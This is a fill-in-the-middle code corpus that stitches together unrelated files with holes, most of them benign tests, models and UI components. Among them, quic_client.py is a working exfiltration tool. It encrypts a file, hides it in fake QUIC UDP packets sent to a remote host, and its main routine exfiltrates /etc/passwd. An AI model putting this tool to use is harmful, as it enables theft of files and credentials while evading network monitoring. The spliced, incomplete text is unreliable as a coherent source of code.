<|file_name|>test_patchset.rs<|end_file_name|><|fim▁begin|>extern crate unidiff; use unidiff::PatchSet; #[test] fn test_parse_sample0_diff() { let buf = include_str!("fixtures/sample0.diff"); <|fim▁hole|> let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); // three file in the patch assert_eq!(3, patch.len()); // three hunks assert_eq!(3, patch[0].len()); // first file is modified assert!(patch[0].is_modified_file()); assert!(!patch[0].is_added_file()); assert!(!patch[0].is_removed_file()); // Hunk 1: five additions, no deletions, a section header assert_eq!(6, patch[0][0].added()); assert_eq!(0, patch[0][0].removed()); assert_eq!("Section Header", &patch[0][0].section_header); // Hunk 2: 2 additions, 8 deletions, no section header assert_eq!(2, patch[0][1].added()); assert_eq!(8, patch[0][1].removed()); assert_eq!("", &patch[0][1].section_header); // Hunk 3: four additions, no deletions, no section header assert_eq!(4, patch[0][2].added()); assert_eq!(0, patch[0][2].removed()); assert_eq!("", &patch[0][2].section_header); // Check file totals assert_eq!(12, patch[0].added()); assert_eq!(8, patch[0].removed()); // second file is added assert!(!patch[1].is_modified_file()); assert!(patch[1].is_added_file()); assert!(!patch[1].is_removed_file()); // third file is removed assert!(!patch[2].is_modified_file()); assert!(!patch[2].is_added_file()); assert!(patch[2].is_removed_file()); } #[test] fn test_parse_git_diff() { let buf = include_str!("fixtures/git.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_bzr_diff() { let buf = include_str!("fixtures/bzr.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_hg_diff() { let buf = include_str!("fixtures/hg.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, 
removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_svn_diff() { let buf = include_str!("fixtures/svn.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("added_file", added_files[0].path()); assert_eq!(4, added_files[0].added()); assert_eq!(0, added_files[0].removed()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("removed_file", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(3, removed_files[0].removed()); let modified_files = patch.modified_files(); assert_eq!(1, modified_files.len()); assert_eq!("modified_file", modified_files[0].path()); assert_eq!(3, modified_files[0].added()); assert_eq!(1, modified_files[0].removed()); } #[test] fn test_parse_line_numbers() { let buf = include_str!("fixtures/sample0.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); let mut target_line_nos = vec![]; let mut source_line_nos = vec![]; let mut diff_line_nos = vec![]; for diff_file in patch { for hunk in diff_file { for line in hunk { source_line_nos.push(line.source_line_no.clone()); target_line_nos.push(line.target_line_no.clone()); diff_line_nos.push(line.diff_line_no); } } } let expected_target_line_nos = vec![ // File: 1, Hunk: 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), // File: 1, Hunk: 2 Some(11), Some(12), Some(13), None, None, None, None, None, None, None, Some(14), Some(15), Some(16), None, Some(17), Some(18), Some(19), Some(20), // File: 1, Hunk: 3 Some(22), Some(23), Some(24), Some(25), Some(26), Some(27), Some(28), // File: 2, Hunk 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), // File: 3, Hunk 1 None, None, None, None, None, None, None, None, None, ]; let expected_source_line_nos = vec![ // File: 1, Hunk: 1 None, None, None, None, None, None, Some(1), Some(2), Some(3), // File: 1, Hunk: 2 Some(5), Some(6), Some(7), Some(8), Some(9), Some(10), Some(11), Some(12), Some(13), Some(14), None, Some(15), Some(16), Some(17), None, Some(18), Some(19), Some(20), // File: 1, Hunk: 3 Some(22), Some(23), Some(24), None, None, None, None, // File: 2, Hunk 1 None, None, None, None, None, None, None, None, None, // File: 3, Hunk 1 Some(1), Some(2), Some(3), Some(4), Some(5), Some(6), Some(7), Some(8), Some(9), ]; let expected_diff_line_nos = vec![ // File: 1, Hunk: 1 4, 5, 6, 7, 8, 9, 10, 11, 12, // File: 1, Hunk: 2 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, // File: 1, Hunk: 3 33, 34, 35, 36, 37, 38, 39, // File: 2, Hunk 1 43, 44, 45, 46, 47, 48, 49, 50, 51, // File: 3, Hunk 1 55, 56, 57, 58, 59, 60, 61, 62, 63, ]; assert_eq!(expected_source_line_nos, source_line_nos); assert_eq!(expected_target_line_nos, target_line_nos); assert_eq!(expected_diff_line_nos, diff_line_nos); } #[cfg(feature = "encoding")] #[test] fn test_parse_from_encoding() { let buf = include_bytes!("fixtures/sample3.diff"); let mut patch = PatchSet::from_encoding("utf-8"); patch.parse_bytes(buf).unwrap(); assert_eq!(3, patch.len()); assert_eq!("holá mundo!", patch[0][0][1].value); } #[test] fn test_single_line_diff() { { let buf = 
include_str!("fixtures/sample4.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(1, patch.len()); let added_files = patch.added_files(); assert_eq!(1, added_files.len()); assert_eq!("sample.txt", added_files[0].path()); assert_eq!(1, added_files[0].added()); assert_eq!(0, added_files[0].removed()); } { let buf = include_str!("fixtures/sample5.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(1, patch.len()); let removed_files = patch.removed_files(); assert_eq!(1, removed_files.len()); assert_eq!("sample.txt", removed_files[0].path()); assert_eq!(0, removed_files[0].added()); assert_eq!(1, removed_files[0].removed()); } } #[test] fn test_single_line_diff_with_trailer() { let buf = include_str!("fixtures/sample4-plus.diff"); let mut patch = PatchSet::new(); patch.parse(&buf).unwrap(); assert_eq!(3, patch.len()); let added_files = patch.added_files(); assert_eq!(3, added_files.len()); assert_eq!("sample.txt", added_files[0].path()); assert_eq!(1, added_files[0].added()); assert_eq!(0, added_files[0].removed()); assert_eq!("sample2.txt", added_files[1].path()); assert_eq!(1, added_files[1].added()); assert_eq!(0, added_files[1].removed()); assert_eq!("sample3.txt", added_files[2].path()); assert_eq!(1, added_files[2].added()); assert_eq!(0, added_files[2].removed()); } #[test] fn test_parse_patchset_from_str() { let buf = include_str!("fixtures/sample0.diff"); let patch: PatchSet = buf.parse().unwrap(); // three file in the patch assert_eq!(3, patch.len()); // three hunks assert_eq!(3, patch[0].len()); }<|fim▁end|>
<|file_name|>LookAround.js<|end_file_name|><|fim▁begin|>/** * Created by shuis on 2017/5/29. */ import React, { Component } from 'react'; import { View, Image, FlatList, TouchableWithoutFeedback } from 'react-native'; import {TabBarIcon, TweetSeparator} from '../component/base'; import Tweet from '../component/Tweet'; import {public_timeline} from '../api/api'; class LookAround extends Component{ static navigationOptions = ({ navigation }) => ({ title: '随便看看', tabBarLabel: '发现', tabBarIcon: <TabBarIcon icon={require('../img/discovery.png')}/>, headerRight: ( <TouchableWithoutFeedback onPress={()=>{navigation.state.params.onPress()}}> <View style={{padding:10}}> <Image source={require('../img/refresh.png')}/> </View> </TouchableWithoutFeedback> ) }); constructor(props){ super(props); this.state = { data: [], showImageViewer: false, image: [{url:''}], } } componentWillMount() { this.props.navigation.setParams({ onPress:this._fetch, }) } componentDidMount() { this._fetch(); } _fetch = async () => { try { let res = await public_timeline(); this.setState({ data: res, }); } catch (e) { } }; _renderItem = ({item}) => { return <Tweet item={item} navigation={this.props.navigation}/>; }; _keyExtractor = (item, index) => index; _renderSeparator = () => { return <TweetSeparator/> }; render(){ return ( <View> <FlatList data = {this.state.data} renderItem = {this._renderItem} initialNumToRender = {6} keyExtractor={this._keyExtractor} ItemSeparatorComponent={this._renderSeparator} /> </View> ) } }<|fim▁hole|>export default LookAround;<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|>"""Models for the ``feedback_form`` app.""" from django.contrib.contenttypes.fields import GenericForeignKey from django.contrib.contenttypes.models import ContentType from django.db import models from django.conf import settings from django.utils.encoding import python_2_unicode_compatible from django.utils.translation import ugettext_lazy as _ @python_2_unicode_compatible class Feedback(models.Model): """ Holds information about one user feedback. :user: User account of the poster, if logged in. :email: Email field, if user isn't logged in and wants to send her email. :current_url: URL of the current page. :message: Feedback text. :creation_date: Datetime of the feedback creation. :content_object: Optional related object the feedback is referring to. """ user = models.ForeignKey( settings.AUTH_USER_MODEL, verbose_name=_('User'), related_name='feedback_form_submissions', blank=True, null=True, ) email = models.EmailField( verbose_name=_('Email'), blank=True, ) current_url = models.URLField( verbose_name=_('Current URL'), max_length=4000, blank=True, ) message = models.TextField( verbose_name=_('Message'), max_length=4000, ) creation_date = models.DateTimeField( auto_now_add=True, verbose_name=_('Creation Date'), ) # Generic FK to the object this feedback is about content_type = models.ForeignKey( ContentType, related_name='feedback_content_objects', null=True, blank=True, ) object_id = models.PositiveIntegerField(null=True, blank=True) content_object = GenericForeignKey('content_type', 'object_id') class Meta: ordering = ['-creation_date'] def __str__(self): if self.user: return '{0} - {1}'.format(self.creation_date, self.user) elif self.email: return '{0} - {1}'.format(self.creation_date, self.email)<|fim▁hole|><|fim▁end|>
return '{0}'.format(self.creation_date)
<|file_name|>quic_client.py<|end_file_name|><|fim▁begin|>import sys import time import socket import struct import random import hashlib import urllib2 from Crypto import Random from Crypto.Cipher import AES # from itertools import izip_longest # Setting timeout so that we won't wait forever timeout = 2 socket.setdefaulttimeout(timeout) limit = 256*256*256*256 - 1 def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() def chunkstring(s, n): return [ s[i:i+n] for i in xrange(0, len(s), n) ] class AESCipher(object): def __init__(self, key): self.bs = 32 self.key = hashlib.sha256(key.encode()).digest() def encrypt(self, raw): raw = self._pad(raw) iv = Random.new().read(AES.block_size) cipher = AES.new(self.key, AES.MODE_CBC, iv) return iv + cipher.encrypt(raw) def decrypt(self, enc): # enc = base64.b64decode(enc) iv = enc[:AES.block_size] cipher = AES.new(self.key, AES.MODE_CBC, iv) return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8') def _pad(self, s): return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) @staticmethod def _unpad(s): return s[:-ord(s[len(s)-1:])] class QUICClient(): def __init__(self, host, key, port=443, max_size=4096): # Params for all class self.host = host self.port = port self.max_size = max_size - 60 self.AESDriver = AESCipher(key=key) self.serv_addr = (host, port) # Class Globals self.max_packets = 255 # Limitation by QUIC itself. self._genSeq() # QUIC Sequence is used to know that this is the same sequence, # and it's a 20 byte long that is kept the same through out the # session and is transfered hex encoded. self.delay = 0.1 self.sock = None if self._createSocket() is 1: # Creating a UDP socket object sys.exit(1) self.serv_addr = (self.host, self.port) # Creating socket addr format def _genSeq(self): self.raw_sequence = random.getrandbits(64) parts = [] while self.raw_sequence: parts.append(self.raw_sequence & limit) self.raw_sequence >>= 32 self.sequence = struct.pack('<' + 'L'*len(parts), *parts) # struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4') return 0 def _createSocket(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock = sock return 0 except socket.error as e: sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e) return 1 def _getQUICHeader(self, count): if type(count) is not hex: try: count_id = chr(count) except: sys.stderr.write("Count must be int or hex.\n") return 1 else: count_id = count if count > self.max_packets: sys.stderr.write("[-]\tCount must be maximum of 255.\n") return 1 header = "\x0c" # Public Flags header += self.sequence # Adding CID header += count_id # Packet Count return header def _getFileContent(self, file_path): try: f = open(file_path, 'rb') data = f.read() f.close() sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path) return data except IOError, e: sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e)) return 1 def sendFile(self, file_path): # Get File content data = self._getFileContent(file_path) if data == 1: return 1 # Check that the file is not too big. 
if len(data) > (self.max_packets * self.max_size): sys.stderr.write("[!]\tFile is too big for export.\n") return 1 # If the file is not too big, start exfiltration # Exfiltrate first packet md5_sum = md5(file_path) # Get MD5 sum of file packets_count = (len(data) / self.max_size)+1 # Total packets first_packet = self._getQUICHeader(count=0) # Get header for first file r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header r_data = self.AESDriver.encrypt(r_data) # Encrypt data self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data sys.stdout.write("[+]\tSent initiation packet.\n") # encrypted_content = self.AESDriver.encrypt(data)<|fim▁hole|> # Encrypt the Chunks raw_dat = "" chunks = [] while data: raw_dat += data[:self.max_size] enc_chunk = self.AESDriver.encrypt(data[:self.max_size]) print len(enc_chunk) chunks.append(enc_chunk) data = data[self.max_size:] i = 1 for chunk in chunks: this_data = self._getQUICHeader(count=i) this_data += chunk self.sock.sendto(this_data, self.serv_addr) time.sleep(self.delay) sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count)) i += 1 sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port)) # self.sequence = struct.pack('<' + 'L'*len(parts), *parts) return 0 def close(self): time.sleep(0.1) self.sock.close() return 0 if __name__ == "__main__": client = QUICClient(host='127.0.0.1', key="123", port=443) # Setup a server a = struct.unpack('<LL', client.sequence) # Get CID used a = (a[1] << 32) + a[0] sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a) client.sendFile("/etc/passwd") # Exfil File client.close() # Close<|fim▁end|>
<|file_name|>hint_metrics.rs<|end_file_name|><|fim▁begin|>//! Describe font hint metrics /// Specifies whether to hint font metrics; hinting font metrics means quantizing them so that they are integer values in device space. Doing this improves the consistency of letter and line spacing, however it also means that text will be laid out differently at different zoom factors. /// /// Since 1.0 #[repr(i32)] pub enum HintMetrics { /// Hint metrics in the default manner for the font backend and target device, since 1.0 Default = 0, /// Do not hint font metrics, since 1.0 Off = 1, /// Hint font metrics, since 1.0 On = 2<|fim▁hole|>}<|fim▁end|>
<|file_name|>UpdateProcessAction.java<|end_file_name|><|fim▁begin|>/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ package org.elasticsearch.xpack.core.ml.action; import org.elasticsearch.action.ActionType; import org.elasticsearch.action.support.tasks.BaseTasksResponse; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.common.xcontent.StatusToXContentObject; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xpack.core.ml.job.config.JobUpdate; import org.elasticsearch.xpack.core.ml.job.config.MlFilter; import org.elasticsearch.xpack.core.ml.job.config.ModelPlotConfig; import org.elasticsearch.xpack.core.ml.job.config.PerPartitionCategorizationConfig; import java.io.IOException; import java.util.List; import java.util.Objects; public class UpdateProcessAction extends ActionType<UpdateProcessAction.Response> { public static final UpdateProcessAction INSTANCE = new UpdateProcessAction(); public static final String NAME = "cluster:internal/xpack/ml/job/update/process"; private UpdateProcessAction() { super(NAME, UpdateProcessAction.Response::new); } public static class Response extends BaseTasksResponse implements StatusToXContentObject, Writeable { private final boolean isUpdated; public Response() { super(null, null); this.isUpdated = true; } public Response(StreamInput in) throws IOException { super(in); isUpdated = in.readBoolean(); } @Override public void writeTo(StreamOutput out) throws IOException { super.writeTo(out); out.writeBoolean(isUpdated); } public boolean isUpdated() { return isUpdated; } @Override public RestStatus status() { return RestStatus.ACCEPTED; } @Override public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); builder.field("updated", isUpdated); builder.endObject(); return builder; } @Override public int hashCode() { return Objects.hashCode(isUpdated); } @Override public boolean equals(Object obj) {<|fim▁hole|> } if (getClass() != obj.getClass()) { return false; } Response other = (Response) obj; return this.isUpdated == other.isUpdated; } } public static class Request extends JobTaskRequest<Request> { private ModelPlotConfig modelPlotConfig; private PerPartitionCategorizationConfig perPartitionCategorizationConfig; private List<JobUpdate.DetectorUpdate> detectorUpdates; private MlFilter filter; private boolean updateScheduledEvents = false; public Request(StreamInput in) throws IOException { super(in); modelPlotConfig = in.readOptionalWriteable(ModelPlotConfig::new); perPartitionCategorizationConfig = in.readOptionalWriteable(PerPartitionCategorizationConfig::new); if (in.readBoolean()) { detectorUpdates = in.readList(JobUpdate.DetectorUpdate::new); } filter = in.readOptionalWriteable(MlFilter::new); updateScheduledEvents = in.readBoolean(); } @Override public void writeTo(StreamOutput out) throws IOException { super.writeTo(out); out.writeOptionalWriteable(modelPlotConfig); out.writeOptionalWriteable(perPartitionCategorizationConfig); boolean hasDetectorUpdates = detectorUpdates != null; out.writeBoolean(hasDetectorUpdates); if (hasDetectorUpdates) { out.writeList(detectorUpdates); } 
out.writeOptionalWriteable(filter); out.writeBoolean(updateScheduledEvents); } public Request( String jobId, ModelPlotConfig modelPlotConfig, PerPartitionCategorizationConfig perPartitionCategorizationConfig, List<JobUpdate.DetectorUpdate> detectorUpdates, MlFilter filter, boolean updateScheduledEvents ) { super(jobId); this.modelPlotConfig = modelPlotConfig; this.perPartitionCategorizationConfig = perPartitionCategorizationConfig; this.detectorUpdates = detectorUpdates; this.filter = filter; this.updateScheduledEvents = updateScheduledEvents; } public ModelPlotConfig getModelPlotConfig() { return modelPlotConfig; } public PerPartitionCategorizationConfig getPerPartitionCategorizationConfig() { return perPartitionCategorizationConfig; } public List<JobUpdate.DetectorUpdate> getDetectorUpdates() { return detectorUpdates; } public MlFilter getFilter() { return filter; } public boolean isUpdateScheduledEvents() { return updateScheduledEvents; } @Override public int hashCode() { return Objects.hash( getJobId(), modelPlotConfig, perPartitionCategorizationConfig, detectorUpdates, filter, updateScheduledEvents ); } @Override public boolean equals(Object obj) { if (obj == null) { return false; } if (getClass() != obj.getClass()) { return false; } Request other = (Request) obj; return Objects.equals(getJobId(), other.getJobId()) && Objects.equals(modelPlotConfig, other.modelPlotConfig) && Objects.equals(perPartitionCategorizationConfig, other.perPartitionCategorizationConfig) && Objects.equals(detectorUpdates, other.detectorUpdates) && Objects.equals(filter, other.filter) && Objects.equals(updateScheduledEvents, other.updateScheduledEvents); } } }<|fim▁end|>
if (obj == null) { return false;
<|file_name|>events_test.js<|end_file_name|><|fim▁begin|>module('system/props/events_test'); test('listener should receive event - removing should remove', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); equal(count, 0, 'nothing yet'); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'received event'); Ember.removeListener(obj, 'event!', F); count = 0; Ember.sendEvent(obj, 'event!'); equal(count, 0, 'received event'); }); test('listeners should be inherited', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); var obj2 = Ember.create(obj); equal(count, 0, 'nothing yet'); Ember.sendEvent(obj2, 'event!'); equal(count, 1, 'received event'); Ember.removeListener(obj2, 'event!', F); count = 0; Ember.sendEvent(obj2, 'event!'); equal(count, 0, 'did not receive event'); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'should still invoke on parent'); }); test('adding a listener more than once should only invoke once', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'should only invoke once'); }); test('adding a listener with a target should invoke with target', function() { var obj = {}, target; target = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); Ember.sendEvent(obj, 'event!'); equal(target.count, 1, 'should invoke'); }); test('suspending a listener should not invoke during callback', function() { var obj = {}, target, otherTarget; target = { count: 0, method: function() { this.count++; } }; otherTarget = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); Ember.addListener(obj, 'event!', otherTarget, otherTarget.method); function callback() { equal(this, target); Ember.sendEvent(obj, 'event!'); return 'result'; } Ember.sendEvent(obj, 'event!'); equal(Ember._suspendListener(obj, 'event!', target, target.method, callback), 'result'); Ember.sendEvent(obj, 'event!'); equal(target.count, 2, 'should invoke'); equal(otherTarget.count, 3, 'should invoke'); }); test('adding a listener with string method should lookup method on event delivery', function() { var obj = {}, target; target = { count: 0, method: function() {} }; Ember.addListener(obj, 'event!', target, 'method'); Ember.sendEvent(obj, 'event!'); equal(target.count, 0, 'should invoke but do nothing'); target.method = function() { this.count++; }; Ember.sendEvent(obj, 'event!'); equal(target.count, 1, 'should invoke now'); }); test('calling sendEvent with extra params should be passed to listeners', function() { var obj = {}, params = null; Ember.addListener(obj, 'event!', function() { params = Array.prototype.slice.call(arguments); }); Ember.sendEvent(obj, 'event!', ['foo', 'bar']); deepEqual(params, ['foo', 'bar'], 'params should be saved'); }); test('implementing sendEvent on object should invoke', function() { var obj = { sendEvent: function(eventName, params) { equal(eventName, 'event!', 'eventName'); deepEqual(params, ['foo', 'bar']); this.count++; }, count: 0 }; Ember.addListener(obj, 'event!', obj, function() { this.count++; }); Ember.sendEvent(obj, 'event!', ['foo', 'bar']);<|fim▁hole|> equal(obj.count, 2, 'should have invoked method & listener'); }); test('hasListeners tells you if there are listeners for a given event', function() { var obj = {}, F = function() 
{}, F2 = function() {}; equal(Ember.hasListeners(obj, 'event!'), false, 'no listeners at first'); Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!', F); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), false, 'has no more listeners'); Ember.addListener(obj, 'event!', F); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); }); test('calling removeListener without method should remove all listeners', function() { var obj = {}, F = function() {}, F2 = function() {}; equal(Ember.hasListeners(obj, 'event!'), false, 'no listeners at first'); Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!'); equal(Ember.hasListeners(obj, 'event!'), false, 'has no more listeners'); }); test('while suspended, it should not be possible to add a duplicate listener', function() { var obj = {}, target; target = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); function callback() { Ember.addListener(obj, 'event!', target, target.method); } Ember.sendEvent(obj, 'event!'); Ember._suspendListener(obj, 'event!', target, target.method, callback); equal(target.count, 1, 'should invoke'); equal(Ember.meta(obj).listeners['event!'].length, 1, "a duplicate listener wasn't added"); // now test _suspendListeners... Ember.sendEvent(obj, 'event!'); Ember._suspendListeners(obj, ['event!'], target, target.method, callback); equal(target.count, 2, 'should have invoked again'); equal(Ember.meta(obj).listeners['event!'].length, 1, "a duplicate listener wasn't added"); });<|fim▁end|>
<|file_name|>feed_parse_extractSpearpointtranslationsHomeBlog.py<|end_file_name|><|fim▁begin|>def extractSpearpointtranslationsHomeBlog(item): ''' Parser for 'spearpointtranslations.home.blog' ''' vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol) or "preview" in item['title'].lower(): return None tagmap = [ ('Record of the Missing Sect Master', 'Record of the Missing Sect Master', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel'), ] for tagname, name, tl_type in tagmap: if tagname in item['tags']: return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) <|fim▁hole|> return False<|fim▁end|>
<|file_name|>receivers.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # ## This file is part of Zenodo. ## Copyright (C) 2012, 2013, 2014 CERN. ## ## Zenodo is free software: you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation, either version 3 of the License, or ## (at your option) any later version. ## ## Zenodo is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Zenodo. If not, see <http://www.gnu.org/licenses/>. ## ## In applying this licence, CERN does not waive the privileges and immunities ## granted to it by virtue of its status as an Intergovernmental Organization ## or submit itself to any jurisdiction. import os import shutil from flask import current_app from invenio.base.factory import with_app_context @with_app_context(new_context=True) def post_handler_database_create(sender, default_data='', *args, **kwargs): """Load data after demosite creation.""" from invenio.modules.communities.models import Community print(">>> Creating collections for communities...") c = Community.query.filter_by(id='zenodo').first() c.save_collections() c = Community.query.filter_by(id='ecfunded').first() c.save_collections() print(">>> Fixing dbquery for root collection.") from invenio.modules.search.models import Collection from invenio.ext.sqlalchemy import db c = Collection.query.filter_by(id=1).first() c.dbquery = '980__a:0->Z AND NOT 980__a:PROVISIONAL AND NOT ' \ '980__a:PENDING AND NOT 980__a:SPAM AND NOT 980__a:REJECTED ' \ 'AND NOT 980__a:DARK' db.session.commit() @with_app_context(new_context=True) def clean_data_files(sender, *args, **kwargs): """Clean data in directories.""" dirs = [ current_app.config['DEPOSIT_STORAGEDIR'], current_app.config['CFG_TMPDIR'], current_app.config['CFG_TMPSHAREDDIR'], current_app.config['CFG_LOGDIR'], current_app.config['CFG_CACHEDIR'], current_app.config['CFG_RUNDIR'], current_app.config['CFG_BIBDOCFILE_FILEDIR'], ] for d in dirs: print(">>> Cleaning {0}".format(d))<|fim▁hole|> shutil.rmtree(d) os.makedirs(d) @with_app_context(new_context=True) def post_handler_demosite_populate(sender, default_data='', *args, **kwargs): """Load data after records are created."""<|fim▁end|>
if os.path.exists(d):
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>use std::panic::catch_unwind;
use std::sync::Arc;

use env_logger::*;
use expectest::expect;
use expectest::prelude::*;
use maplit::*;
use serde_json::json;

use pact_consumer::*;
use pact_consumer::prelude::*;
use pact_models::Consumer;
use pact_models::pact::Pact;
use pact_models::PACT_RUST_VERSION;
use pact_models::provider_states::*;
use pact_models::sync_interaction::RequestResponseInteraction;
use pact_models::sync_pact::RequestResponsePact;

use crate::callback_executors::HttpRequestProviderStateExecutor;
use crate::pact_broker::Link;
use crate::PactSource;

use super::{execute_state_change, filter_consumers, filter_interaction, FilterInfo};

#[test]
fn if_no_interaction_filter_is_defined_returns_true() {
  let interaction = RequestResponseInteraction::default();
  expect!(filter_interaction(&interaction, &FilterInfo::None)).to(be_true());
}

#[test]
fn if_an_interaction_filter_is_defined_returns_false_if_the_description_does_not_match() {
  let interaction = RequestResponseInteraction { description: "bob".to_string(), .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::Description("fred".to_string()))).to(be_false());
}

#[test]
fn if_an_interaction_filter_is_defined_returns_true_if_the_description_does_match() {
  let interaction = RequestResponseInteraction { description: "bob".to_string(), .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::Description("bob".to_string()))).to(be_true());
}

#[test]
fn uses_regexs_to_match_the_description() {
  let interaction = RequestResponseInteraction { description: "bobby".to_string(), .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::Description("bob.*".to_string()))).to(be_true());
}

#[test]
fn if_an_interaction_state_filter_is_defined_returns_false_if_the_state_does_not_match() {
  let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bob".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::State("fred".to_string()))).to(be_false());
}

#[test]
fn if_an_interaction_state_filter_is_defined_returns_true_if_the_state_does_match() {
  let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bob".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::State("bob".to_string()))).to(be_true());
}

#[test]
fn uses_regexs_to_match_the_state() {
  let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() };
  expect!(filter_interaction(&interaction, &FilterInfo::State("bob.*".to_string()))).to(be_true());
}

#[test]
